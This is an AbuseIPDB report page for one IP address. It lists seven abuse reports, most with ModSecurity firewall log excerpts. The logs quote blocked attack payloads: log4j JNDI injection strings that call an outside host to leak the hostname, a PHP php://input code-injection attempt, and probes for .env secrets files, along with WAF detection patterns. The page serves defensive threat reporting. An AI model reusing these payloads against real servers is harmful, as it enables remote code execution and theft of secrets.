JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 43.245.116.164

43.245.116.164 was found in our database!

This IP was reported 7 times. Confidence of Abuse is 1%: ?

ISP	trafficforce, UAB
Usage Type	Commercial
ASN	AS133944
Domain Name	trafficforce.lt
Country	🇹🇷 Turkey
City	Istanbul, Istanbul

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 43.245.116.164

Whois 43.245.116.164

IP Abuse Reports for 43.245.116.164:

This IP address has been reported a total of 7 times from 3 distinct sources. 43.245.116.164 was first reported on April 27th 2025, and the most recent report was 3 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 3 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
Anonymous	2026-05-28 11:50:03 (3 weeks ago)	\| A web attack returned code 200 (success).	Web App Attack Hacking SQL Injection
🇺🇸 TPI-Abuse	2026-01-16 16:07:41 (5 months ago)	(mod_security) mod_security (id:210730) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210730) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jan 16 11:07:37.577998 2026] [security2:error] [pid 17161:tid 17161] [client 43.245.116.164:59441] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|ftp.nbcnewsradio.com\|F\|2"] [data ".axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.nbcnewsradio.com"] [uri "/elmah.axd"] [unique_id "aWpiSQGpLPgsRzDhtAkAMwAAABU"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-12-01 05:44:44 (6 months ago)	(mod_security) mod_security (id:218420) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:218420) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 01 00:42:39.887134 2025] [security2:error] [pid 26090:tid 26460] [client 43.245.116.164:47241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in\|out\|err)\|(in\|out)put\|fd\|memory\|temp\|filter)" at ARGS_NAMES:\\xadd allow_url_include=1 \\xadd auto_prepend_file=php://input. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found\|\|kettlehill.com\|F\|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\x5cxadd allow_url_include=1 \\x5cxadd auto_prepend_file=php://input: \\xadd allow_url_include=1 \\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "kettlehill.com"] [uri "/index.php"] [unique_id "aS0qzwqR0geke5MRGl786wAAAI4"] show less	Brute-Force Bad Web Bot Web App Attack
🇮🇹 mgarofano80	2025-10-23 03:10:06 (7 months ago)		Brute-Force Web App Attack
🇺🇸 TPI-Abuse	2025-10-01 17:10:19 (8 months ago)	(mod_security) mod_security (id:210492) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:210492) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Oct 01 13:10:09.127206 2025] [security2:error] [pid 28909:tid 28921] [client 43.245.116.164:34699] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "whm.kettlehill.com"] [uri "/api/.env"] [unique_id "aN1gccqzZow6xCeNbL7sXAAAAAc"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-05-01 02:47:24 (1 year ago)	(mod_security) mod_security (id:248270) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:248270) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Apr 30 22:47:01.076403 2025] [security2:error] [pid 10930:tid 11170] [client 43.245.116.164:55231] [client 43.245.116.164] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at ARGS:x. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|mail.kettlehill.net\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "mail.kettlehill.net"] [uri "/"] [unique_id "aBLgpX9d7Z86Td3fBuetqwAAARM"], referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d09e15tk3cfs7rbtqqi064hczgg84qxhd.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-04-27 16:38:16 (1 year ago)	(mod_security) mod_security (id:248270) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Por ... show more (mod_security) mod_security (id:248270) triggered by 43.245.116.164 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Apr 27 12:38:10.357148 2025] [security2:error] [pid 27836:tid 27857] [client 43.245.116.164:55101] [client 43.245.116.164] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at REQUEST_HEADERS:Accept. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|www.seodev.spinningdesigns.com\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "seodev.spinningdesigns.com"] [uri "/"] [unique_id "aA5dcj5WRZFoShq2DgxBEQAAAQs"], referer: ${jndi:ldap://${:-130}${:-493}.${hostName}.referer.d075qk5k3cfuktu99cs0uw4os5p3ue9yn.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack

Showing 1 to 7 of 7 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇮🇩 157.10.182.14

🇨🇳 113.250.55.132

🇺🇸 76.79.213.70

🇨🇳 220.179.87.203

🇳🇱 176.65.139.181

🇳🇱 176.65.132.181

🇺🇸 74.7.244.56

🇺🇸 74.7.243.131

🇺🇸 74.7.230.43

🇺🇸 74.7.227.165

🇺🇸 47.77.231.186

🇧🇷 45.229.91.34

🇺🇸 43.166.245.172

🇯🇵 43.153.185.56

🇨🇳 27.185.75.194

🇳🇱 185.242.226.60

🇵🇭 154.18.197.35

🇿🇦 102.129.54.47

🇺🇸 43.165.64.247

🇮🇳 209.38.120.71